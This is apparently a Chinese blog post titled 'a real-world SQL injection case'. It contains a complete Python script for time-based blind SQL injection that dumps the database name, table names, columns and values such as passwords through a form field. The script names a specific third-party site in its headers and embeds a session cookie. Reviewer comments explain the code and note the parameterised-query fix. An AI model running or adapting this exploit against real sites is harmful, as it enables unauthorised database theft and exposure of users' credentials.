实战SQL注入案例
记录一次实战
1、在测试中,使用awvs发现SQL注入点,使用sqlmap工具无法跑出结果
提示payload: (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
2、编写python脚本
import requests
import time
from requests.packages.urllib3.exceptions import InsecureRequestWarning,InsecurePlatformWarning
# Every requests.post() below passes verify=False, i.e. TLS certificate
# validation is off for the whole run; these two calls only silence the
# warnings urllib3 would print about that, they do not make it any safer.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
requests.packages.urllib3.disable_warnings(InsecurePlatformWarning)
# The probes in this file only work because the `pid` form field ends up
# inside a SQL statement; server-side, binding it as a query parameter (or
# rejecting anything non-numeric, since the sibling fields cid/ontype/page
# are sent as plain integers) would close the timing channel entirely.

# Alphabet tried, in this order, for every character position. The first
# character whose probe delays the response is accepted for that position,
# so the order of this string decides which candidate wins.
value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!"
# Accumulator that get_data() extends through `global result`; it is never
# reset, so repeated calls keep appending to it.
result=""
def get_data_len():
    """Probe the length of the current database name via response latency.

    For each candidate length 0..29 the `pid` form field carries a SQL
    expression that calls sleep(5) only when length(database()) equals the
    candidate. A response that takes more than 3 s is treated as a match.

    Returns:
        The first candidate length whose probe was slow, or None when none
        of the 30 candidates delayed the response.

    Relies on the module-level `url` and `headers` assigned in the
    __main__ block.
    """
    for i in range(0,30):
        # Fixed one-second pacing between probes.
        time.sleep(1)
        # Same shape as the payload the scanner reported at the top of the
        # page; only the IF(...) condition differs from probe to probe.
        newr="""(select(0)from(select(IF(length(database())={0},sleep(5),0)))v)/*'+(select(0)from(select(IF(length(database())={0},sleep(5),0)))v)+'"+(select(0)from(select(IF(length(database())={0},sleep(5),0)))v)+"*/""".format(i)
        payload = newr
        start_time = time.time()
        data = {"cid":0,"ontype":2,"page":1,"pid":payload}
        # verify=False: no certificate validation. The response body (`html`)
        # is never inspected; elapsed wall-clock time is the only oracle.
        html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
        end_time = time.time()
        use_time = end_time - start_time
        # Threshold sits below the 5 s sleep. Any network stall longer than
        # 3 s on a non-matching probe is read as a match (false positive).
        if use_time > 3:
            print("...... data's length is :"+ str(i))
            return i
def get_data(length):
    """Recover the current database name one character at a time.

    For positions 1 .. length-1 (MySQL substr() positions are 1-based) every
    character of `value` is tried in order; the first one whose probe delays
    the response by more than 4 s is appended to the module-level `result`.
    A position where no character matches is skipped without any marker, so
    the returned string can be shorter than the real name.

    Args:
        length: Upper bound for the positions to probe; position `length`
            itself is not probed.

    Returns:
        The module-level `result` string after this call extended it
        (characters already present from earlier calls are kept).

    Relies on the module-level `url`, `headers`, `value` and `result`.
    """
    global result
    for n in range(1,length):
        for v in value:
            # Fixed one-second pacing between probes.
            time.sleep(1)
            data_payload="database()"
            # Same shape as the scanner's payload at the top of the page;
            # only the IF(...) condition changes between probes.
            newr="""(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(data_payload,n,ord(v))
            payload = newr
            data = {"cid":0,"ontype":2,"page":1,"pid":payload}
            start_time = time.time()
            # verify=False: no certificate validation. The response body
            # (`html`) is never inspected; elapsed time is the only oracle.
            html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
            end_time = time.time()
            use_time = end_time - start_time
            # Below the 5 s sleep; a network stall longer than 4 s on a
            # non-matching probe is read as a match (false positive).
            if use_time >4:
                result += v
                print("数据库名:"+result)
                break
    return result
def get_biao_data(length,table_num):
    """Recover one table name of the current database character by character.

    The name is taken from information_schema.tables at zero-based offset
    `table_num` (LIMIT table_num,1). Positions 1 .. length-1 are probed with
    every character of `value`; the first character whose probe delays the
    response by more than 4 s is accepted. Unlike get_data(), a position
    where no character matches ends the name and the function returns early.

    Args:
        length: Upper bound for the positions to probe; position `length`
            itself is not probed.
        table_num: Zero-based index of the table within the schema.

    Returns:
        The characters recovered so far (possibly empty).

    Relies on the module-level `url`, `headers` and `value`.
    """
    table_name_new=""
    biao_flag=0
    for n in range(1,length):
        for v in value:
            # Fixed one-second pacing between probes.
            time.sleep(1)
            # Reset per candidate; set to 1 only when this position matched.
            biao_flag=0
            data_payload="(select table_name from information_schema.tables where table_schema=database() limit {0},1)".format(table_num) # which table: zero-based offset into the LIMIT
            # Same shape as the scanner's payload at the top of the page.
            payload = """(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(data_payload,n,ord(v))
            data = {"cid":0,"ontype":2,"page":1,"pid":payload}
            start_time = time.time()
            # verify=False: no certificate validation. `html` is never read;
            # elapsed time is the only oracle.
            html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
            end_time = time.time()
            use_time = end_time - start_time
            # A network stall longer than 4 s on a non-matching probe is read
            # as a match (false positive).
            if use_time >4:
                table_name_new += v
                print("第 "+str(table_num)+" 个表名:"+table_name_new)
                biao_flag=1
                break
        # No candidate matched at position n: treat the name as complete.
        if biao_flag==0:
            return table_name_new
    return table_name_new
def get_data_lie(length,lie_num): # blind-inject column names
    """Recover one column name of the hard-coded table character by character.

    The name is taken from information_schema.columns for
    table_name='re_user' at zero-based offset `lie_num` (LIMIT lie_num,1);
    the table name is fixed here, whereas get_data_ziduan() takes it as a
    parameter. Positions 1 .. length-1 are probed with every character of
    `value`; the first character whose probe delays the response by more
    than 4 s is accepted. A position where no character matches ends the
    name and the function returns early.

    Args:
        length: Upper bound for the positions to probe; position `length`
            itself is not probed.
        lie_num: Zero-based index of the column within the table.

    Returns:
        The characters recovered so far (possibly empty).

    Relies on the module-level `url`, `headers` and `value`.
    """
    lie_name_new=""
    flag_lie = 0
    for n in range(1,length):
        for v in value:
            # NOTE(review): no time.sleep(1) pacing here, unlike get_data()
            # and get_biao_data(); presumably an oversight rather than intent.
            # Reset per candidate; set to 1 only when this position matched.
            flag_lie = 0
            lie_payload="(select column_name from information_schema.columns where table_name='re_user' limit {0},1)".format(lie_num)
            # Same shape as the scanner's payload at the top of the page.
            payload = """(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(lie_payload,n,ord(v))
            # print ("test:"+str(payload))
            data = {"cid":0,"ontype":2,"page":1,"pid":payload}
            start_time = time.time()
            # verify=False: no certificate validation. `html` is never read;
            # elapsed time is the only oracle.
            html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
            end_time = time.time()
            use_time = end_time - start_time
            # A network stall longer than 4 s on a non-matching probe is read
            # as a match (false positive).
            if use_time >4:
                lie_name_new += v
                print("表名的第"+str(lie_num)+"列名:"+str(lie_name_new)+'\n')
                flag_lie = 1
                break
        # No candidate matched at position n: treat the name as complete.
        if (flag_lie==0):
            return lie_name_new
    return lie_name_new
def get_data_ziduan(length,ziduan_num,tablet_name_set,lie_name_set):
    """Recover one cell value (row `ziduan_num` of column `lie_name_set` in
    table `tablet_name_set`) character by character.

    Both `tablet_name_set` and `lie_name_set` are interpolated unquoted into
    a SELECT ... LIMIT ziduan_num,1 subquery, so they must already be valid
    SQL identifiers. Positions 1 .. length-1 are probed with every character
    of `value`; the first character whose probe delays the response by more
    than 4 s is accepted. A position where no character matches ends the
    value and the function returns early.

    Args:
        length: Upper bound for the positions to probe; position `length`
            itself is not probed.
        ziduan_num: Zero-based row offset within the column.
        tablet_name_set: Table name, used verbatim in the subquery.
        lie_name_set: Column name, used verbatim in the subquery.

    Returns:
        The characters recovered so far (possibly empty).

    Relies on the module-level `url`, `headers` and `value`.
    """
    #global result
    ziduan_name_new=""
    ziduan_flag=0
    for n in range(1,length):
        for v in value:
            # NOTE(review): no time.sleep(1) pacing here, unlike get_data()
            # and get_biao_data().
            # Reset per candidate; set to 1 only when this position matched.
            ziduan_flag=0
            data_payload="(select {0} from {1} limit {2},1)".format(lie_name_set,tablet_name_set,ziduan_num)
            # Same shape as the scanner's payload at the top of the page.
            payload = """(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)/*'+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+'"+(select(0)from(select(IF(ascii(substr({0},{1},1))={2},sleep(5),0)))v)+"*/""".format(data_payload,n,ord(v))
            data = {"cid":0,"ontype":2,"page":1,"pid":payload}
            start_time = time.time()
            # verify=False: no certificate validation. `html` is never read;
            # elapsed time is the only oracle.
            html = requests.post(url, data=data,headers=headers, verify=False, allow_redirects=False)
            end_time = time.time()
            use_time = end_time - start_time
            # A network stall longer than 4 s on a non-matching probe is read
            # as a match (false positive).
            if use_time >4:
                ziduan_name_new += v
                ziduan_flag=1
                print("表"+tablet_name_set+"的列"+lie_name_set+"的第 "+str(ziduan_num)+" 个字段:"+str(ziduan_name_new)+'\n')
                break
        # No candidate matched at position n: treat the value as complete.
        if (ziduan_flag==0):
            return ziduan_name_new
    return ziduan_name_new
if __name__ == "__main__":
    # NOTE(review): the POST goes to 127.0.0.1 while the Host and Referer
    # headers name a different site; presumably a redacted or proxied
    # target -- confirm before reading anything into it.
    url = "http://127.0.0.1"
    headers = {
        'X-Requested-With': 'XMLHttpRequest',
        'Host': '91xiaojiejie.xyz',
        # NOTE(review): requests computes Content-Length from the body it
        # actually sends, so this fixed value is presumably overwritten.
        'Content-Length': '34',
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36',
        'Accept': 'application/json, text/javascript, */*; q=0.01',
        'Referer': 'https://91xiaojiejie.xyz/',
        'Accept-Encoding': 'gzip,deflate,br',
        # A session identifier is embedded in the script: the file itself is
        # a credential until that session is invalidated server-side.
        'Cookie': 'PHPSESSID=vs1odvjn44nh70ve4t0a7grnp7',
    }
    # Dump the database name
    # len=get_data_len()
    # Length hard-coded instead of calling get_data_len(); note this shadows
    # the builtin len() for the rest of the block.
    len = 17
    data_name=get_data(len) # return value is never used afterwards
    for table_num in range(0,20): # enumerate 20 table names
        tablet_name=get_biao_data(20,table_num) # overwritten each iteration, never read
    # Enumerate columns
    # table_num=7
    # for lie_num in range(0,10):
    # lie_name=get_data_lie(20,lie_num)
    # Enumerate field values
    # tablet_name_set="xxx"
    # lie_name_set="password"
    # for ziduan_num in range(0,10):
    # ziduan_name=get_data_ziduan(35,ziduan_num,tablet_name_set,lie_name_set)
版权声明:
本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自
weehhd!